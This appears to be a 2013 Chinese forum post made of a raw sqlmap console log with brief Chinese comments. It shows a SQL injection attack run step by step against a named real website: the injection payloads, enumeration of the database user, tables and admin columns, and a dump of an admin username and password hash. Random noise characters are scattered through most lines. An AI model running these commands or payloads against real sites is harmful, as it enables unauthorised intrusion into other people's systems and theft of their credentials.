D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db; b( M% S) \! w* y% ^
ms "Mysql" --current-user /* 注解:获取当前用户名称2 M; @1 L2 \: r7 G* j( X
sqlmap/0.9 - automatic SQL injection and database takeover tool! t6 a1 q( W# \. `
http://sqlmap.sourceforge.net starting at: 16:53:54
* L2 m. a$ h5 L) t$ ~; A[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
' Y+ e5 l# S/ f2 x$ u session file' w$ o1 e8 F" r2 k. a
[16:53:54] [INFO] resuming injection data from session file
: h& M2 m1 D. N9 c. G# F9 R[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file& \8 U; d3 \+ ^' T- s" ^
[16:53:54] [INFO] testing connection to the target url$ m n+ x# I+ h- c
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
+ I; }8 K1 M) |: l, Rsts:
3 p) h5 y, t6 O5 U- V---
% M6 t9 B# G6 [Place: GET- g, Z8 ~: K# s+ Q1 a; U4 S
Parameter: id% I. X' b" u8 p1 `0 p3 l
Type: boolean-based blind
8 ^7 N4 B" n V& q# m9 b9 u, q7 i Title: AND boolean-based blind - WHERE or HAVING clause
2 B. h J2 `' t8 U Payload: id=276 AND 799=799, [$ d; G6 b/ _
Type: error-based
- h z1 p7 h( g" `% j8 P Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
+ y) p9 `% D7 {7 q p' {/ | Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118, B) ]/ I/ B+ w7 D
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
- }9 p# A3 G I: \+ b7 l),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
0 B) w h4 Z P+ T) E6 V. X Type: UNION query. |4 d% r6 V$ f# C% B. b
Title: MySQL UNION query (NULL) - 1 to 10 columns
8 O) v x- F# {) L Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
: \* ?4 G: k7 \9 K) k- {(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),; t3 |0 e8 P0 n' ?. }
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
- q+ D( N' Q- n7 {# f' i Type: AND/OR time-based blind
/ n! k! A( Z) ^% N+ x i Title: MySQL > 5.0.11 AND time-based blind
3 [( m) H6 C6 h" @3 S+ m) q Payload: id=276 AND SLEEP(5)
1 W6 f8 v: ?4 G: d/ J---& h$ q" F% [5 j, |
[16:53:55] [INFO] the back-end DBMS is MySQL. [: X( D( \) }: x8 U1 n0 T
web server operating system: Windows5 W M" \4 m- k4 ~1 |8 z( [/ C) [/ C
web application technology: Apache 2.2.11, PHP 5.3.0. C$ d7 [& n* D1 Z
back-end DBMS: MySQL 5.07 b, k# @$ a6 l5 U
[16:53:55] [INFO] fetching current user. o& V5 F: J. `; L. x9 r }
current user: 'root@localhost'
" t7 _0 Q x I, P. S) C2 h[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
" q( e6 D; m4 O" b& `. i2 dtput\www.wepost.com.hk' shutting down at: 16:53:581 D: L9 @; K9 u# J4 N
& T! X& @# |8 ?$ _. SD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db) o0 `% i# C' [" A& J
ms "Mysql" --current-db /*当前数据库
: s1 A8 |2 j, [: Q sqlmap/0.9 - automatic SQL injection and database takeover tool
% \. }$ J5 v6 L# A( O: @ http://sqlmap.sourceforge.net starting at: 16:54:16, |4 |- |2 ^& p# I% Y$ d& N
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as6 [; p$ _$ q2 B7 l7 O$ B B7 U1 l& Z6 z
session file* w4 t2 p2 R! v/ R& R" V
[16:54:16] [INFO] resuming injection data from session file
# P8 T. n: D! P' d4 I# e[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file! S ^8 t' o9 a7 k3 g+ U6 ~1 y
[16:54:16] [INFO] testing connection to the target url
7 J2 m& `- s/ U" w5 psqlmap identified the following injection points with a total of 0 HTTP(s) reque7 e2 N/ L" v o
sts:
$ q" {3 Q ]7 T. L; t---) l+ t+ t/ Z2 p) E( x
Place: GET
6 N+ C4 g' n8 ?7 G' YParameter: id& Q$ \% Q5 s3 e
Type: boolean-based blind u3 t6 E/ j: r, y# C/ v! k
Title: AND boolean-based blind - WHERE or HAVING clause
! l/ u' r- ]/ G5 [* s+ \1 | Payload: id=276 AND 799=7999 H0 t; q$ b, ?
Type: error-based- ]% D/ t! _% i; |# v1 H4 H
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
7 _ D: f% K# t2 |+ C# r ~& Q Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,: v, N. E0 p' F( n- x
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58' r# Z6 `' O# {
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)' z" \2 z0 L$ {- G7 T) H* b: M7 V0 B
Type: UNION query
% c X; f6 [0 P0 d7 m# S Title: MySQL UNION query (NULL) - 1 to 10 columns; Y5 D# H& _9 j g0 |" s* d
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
" |3 X/ _" u0 z! ](58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
; r$ r2 d) b% S pCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#. f0 w n( m+ P& Y+ U6 y3 @
Type: AND/OR time-based blind* B$ o. Z0 q6 W- @
Title: MySQL > 5.0.11 AND time-based blind0 o- ~1 V. q6 B7 C4 W
Payload: id=276 AND SLEEP(5)! M3 ^# O, k8 k* W7 g: u, }7 p$ O
---
0 v' E, L! t% J* v8 w) s6 c- l[16:54:17] [INFO] the back-end DBMS is MySQL
^: i# X& y% _8 K9 f- Wweb server operating system: Windows
8 }6 n1 u8 B/ ?' q/ g Gweb application technology: Apache 2.2.11, PHP 5.3.0; l8 K( L4 X, t/ g' {) j8 R
back-end DBMS: MySQL 5.0$ |9 G/ O: v# Q @0 W( \
[16:54:17] [INFO] fetching current database
0 \$ |* t, I1 x2 x- j2 Ncurrent database: 'wepost'
- p. M! e) \% y8 O[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou' e) S% e, e, Z2 _+ Z( y" O/ d
tput\www.wepost.com.hk' shutting down at: 16:54:18
. R* Z- b! G% c2 BD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
+ } T1 h3 b9 }! m1 E9 yms "Mysql" --tables -D "wepost" /*获取当前数据库的表名7 t! t! |* [6 {9 d7 p+ x
sqlmap/0.9 - automatic SQL injection and database takeover tool
v3 ] R( y4 P3 n1 w- u& _! d, D http://sqlmap.sourceforge.net starting at: 16:55:252 k) u$ ?6 k1 c& e) d" L
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as. h ~9 L' T( r! V# Y5 e& e
session file
9 Q0 |( e9 I2 |) I7 ]9 z* Q7 g[16:55:25] [INFO] resuming injection data from session file
" A0 ^5 W" Y$ @4 C* v! G[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file. H. l' ?5 z* r$ ]: U3 j% [
[16:55:25] [INFO] testing connection to the target url/ @3 Y) @: i1 x3 _* ?. F
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
: A* v; {$ [4 X% O7 H. C: \sts:9 Y7 C* t! g+ s
---3 \ X- o1 n2 m" D
Place: GET
5 t4 w+ f; _1 wParameter: id
! ?( s& t1 W0 d( R# R Type: boolean-based blind( M6 h, x/ t0 U3 r2 o [
Title: AND boolean-based blind - WHERE or HAVING clause
. }$ H4 A. @* ? a9 f! j Payload: id=276 AND 799=799
/ C. G% n" P* Q Type: error-based
; o# G9 z/ T8 M) x! G w: F Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause' N, i' D- q* o' o! G3 Z
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
0 u6 }( g* V: E* \7 C! `& w120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
3 e8 j2 \8 N1 ?2 m% G% g: M),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)/ v" R i2 C# X4 G: K) I
Type: UNION query: |% Z3 x; I! M6 k
Title: MySQL UNION query (NULL) - 1 to 10 columns
+ D; Z# P X& B |' d Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
# C7 r$ u, ?* r* |(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
, X5 O; l: {2 HCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
5 O8 y2 k$ Y7 C6 O; C' S% W! k) m Type: AND/OR time-based blind
3 d8 \$ t# h' V) K% m* Y" U' { Title: MySQL > 5.0.11 AND time-based blind; s+ d# E0 J4 l3 a6 k8 D
Payload: id=276 AND SLEEP(5)$ a$ C1 x1 p2 p9 w) } g
---
6 [/ P& P. t- ^) v' u7 O[16:55:26] [INFO] the back-end DBMS is MySQL
1 V0 Q! f2 A$ F8 iweb server operating system: Windows3 T8 S, p& r* F3 l" m
web application technology: Apache 2.2.11, PHP 5.3.0
! G" E: _6 O" N+ X( _1 F" G, X% Lback-end DBMS: MySQL 5.0
* H% x) A5 E: w; k[16:55:26] [INFO] fetching tables for database 'wepost'
) k# }9 ?# T+ M: u6 M5 W1 g[16:55:27] [INFO] the SQL query used returns 6 entries
/ i( s- v4 O/ ?4 _, Y- p' N- c: [6 \* mDatabase: wepost
. e0 I' v5 X- a- P: i* ~[6 tables]
% C! b- ~$ r& V9 R6 j: u5 ^+-------------+
% x" _0 |/ M& E w& @5 |9 S| admin |
" E' m; `9 O& M' |4 w7 s% d( z| article |
" S, ?) p' J. K# a| contributor |
1 j- ]: `3 C/ ?. ?3 K| idea |! e( S0 E) i$ ?1 c
| image |+ Z- P2 n% ], _' j# U
| issue |
2 A8 \* H1 J7 q0 i3 v3 X+-------------+' B. ?6 g2 l$ P! ^" ?0 I: @
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
) b1 f6 q+ n6 g+ U6 X0 qtput\www.wepost.com.hk' shutting down at: 16:55:33) ` y& A2 l) l* g" w
6 \& S& R/ C$ T
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
y7 m* J. B0 ?9 ?: I- yms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名1 a! o& u) V; m
sqlmap/0.9 - automatic SQL injection and database takeover tool
$ W( D0 B2 X- W0 S+ H W$ t. t http://sqlmap.sourceforge.net starting at: 16:56:06
; B S# G t' O) F- G2 E5 I. }* D C A* Qsqlmap identified the following injection points with a total of 0 HTTP(s) reque, B, |& z% d3 k# {
sts:
! V0 i0 o O) m---0 T- e" F/ J# y, b" f
Place: GET3 E. ?8 l0 ]: y$ Q6 ]9 `
Parameter: id
1 l8 G. b% B1 U3 ~( H Type: boolean-based blind3 t, n$ y& L+ D4 @) q2 B
Title: AND boolean-based blind - WHERE or HAVING clause
7 A3 u! J' I/ f Payload: id=276 AND 799=799
( Q1 ]8 `, X" H e) p x' a- D8 ~ Type: error-based
1 X* H. v) c0 ?, N6 O Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
8 B8 L7 }; q/ g Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
4 b4 h! f" X- q* \9 @+ H R5 C+ @120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
9 t3 G& J+ [: N, p' Q1 g),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)% g- I( n1 i6 ~& m% D3 [6 W
Type: UNION query( _) [- c' B. y! m7 r& j! R
Title: MySQL UNION query (NULL) - 1 to 10 columns& x$ x" r0 g) p$ r. t% @
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
) c" B, L8 Q" `* {7 A& U(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( L' C [8 f$ l( r. U5 X. B
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#2 p, c/ d' l6 Q$ ^' v
Type: AND/OR time-based blind
- \3 b8 ?" Q: Q c1 i j Title: MySQL > 5.0.11 AND time-based blind
* T4 X6 y) _" G+ @+ T% Z. } Payload: id=276 AND SLEEP(5)) z G+ q6 f6 t
---5 |: z- u9 }! [4 b3 V0 ?9 i% T
web server operating system: Windows5 L) a8 K+ b; W& t7 i) h& X
web application technology: Apache 2.2.11, PHP 5.3.0! k _" @: H6 |
back-end DBMS: MySQL 5.0
8 @4 X% w3 r- A' f[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
% w9 y% x. t$ }ssion': wepost, wepost
2 v: O( f! q' sDatabase: wepost- y2 v1 t, ]0 l% c' y% x
Table: admin
6 b# o: X2 K% _[4 columns]: c3 |- i* v+ B3 Z- G
+----------+-------------+
" X4 ]0 U. S3 Z F9 o/ D; d| Column | Type |
# S" b( u+ ~ ~, ?/ S _1 }9 L+----------+-------------+3 }4 l. ^1 ?0 u8 f7 c
| id | int(11) |/ c' e/ V: j5 X- K, f' w
| password | varchar(32) |
f! p8 Z) \" {: w1 `4 p| type | varchar(10) |! Z2 l- A8 r" J3 T; x* H
| userid | varchar(20) |* C1 F- q. O; b+ J
+----------+-------------+
1 b/ I$ Y7 h* I7 r shutting down at: 16:56:19
8 x, U+ I) ~ I/ Y: F9 m
7 K3 r/ e; j, M \5 e; g: f& p, I6 ?D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db" {# D# n! s! a& Z4 b1 |) N
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容0 q* N7 s1 a! b9 K
sqlmap/0.9 - automatic SQL injection and database takeover tool
f6 w. q: K/ { m+ ^ http://sqlmap.sourceforge.net starting at: 16:57:149 g M% p4 a$ s5 a
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
% h* `, p8 X0 w7 r! L" A0 V3 U% Csts:
( |0 u5 U! F1 j q) ?---2 Y% \6 r- ^! a6 u% H5 m3 {, k
Place: GET* @5 a0 p* C; T1 D( D) z
Parameter: id3 b5 a& \: ~# p( J& P8 R
Type: boolean-based blind0 F6 G0 ?9 w7 i+ Y
Title: AND boolean-based blind - WHERE or HAVING clause
4 T8 K2 L4 i) R/ f% j Payload: id=276 AND 799=7994 V A0 A0 q# F4 h+ W6 k
Type: error-based. l* }- {+ o6 \7 ^% N
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
( ~6 U! I, j- e [- [3 x Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,+ x% b: I0 D/ S/ M" c" x6 s
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,582 K0 P3 q- f6 Q7 e8 w( ^
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)1 N/ Q- R1 x! j6 q4 E" M
Type: UNION query8 m+ m; F% y! n c' I
Title: MySQL UNION query (NULL) - 1 to 10 columns
& e3 z1 f9 s3 b6 H3 a Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
3 p9 n+ y; A. W$ g$ ?# r/ c(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),6 p( o! @& b( V/ L" J! H9 ^" [7 G
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
$ s) n) {5 j0 |, E5 Z5 V1 l( W/ T Type: AND/OR time-based blind8 _5 K; |! l9 @7 a' U+ o
Title: MySQL > 5.0.11 AND time-based blind1 e" Z0 C2 b, g" `8 B
Payload: id=276 AND SLEEP(5)" C2 w& Y/ z* r. j; x
---% {# t: F0 w, r- e) m
web server operating system: Windows
+ m$ b4 j% ~: g; kweb application technology: Apache 2.2.11, PHP 5.3.05 H# p$ a6 |0 h) T: q
back-end DBMS: MySQL 5.0
4 N7 d" A9 V; P5 k* L6 Frecognized possible password hash values. do you want to use dictionary attack o& Y8 ]1 i: j. G/ `! c9 Y( y& l9 v3 G
n retrieved table items? [Y/n/q] y+ s$ u& z! [& L2 ]% g7 D
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
4 c0 _! C1 w3 vdo you want to use common password suffixes? (slow!) [y/N] y, x/ n# v0 F, v( k( K) |
Database: wepost$ [) |" o2 z8 q/ A* c
Table: admin/ @8 Z& z" o& i: j: d; G
[1 entry]
) o* C* C. @- Z! l/ L+----------------------------------+------------+
; e) g! f" E( ]! P| password | userid |+ b4 I* S8 c' u) |6 m# p
+----------------------------------+------------+8 f3 H# |0 A$ E: `0 \7 [. Z5 D
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
" ]1 H+ b3 w3 d2 \; w& r+----------------------------------+------------+0 w8 `" z% k. a( O5 v( ?
shutting down at: 16:58:147 ^& B* O& P5 `
{ m6 h7 q8 K0 F c8 {" y
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对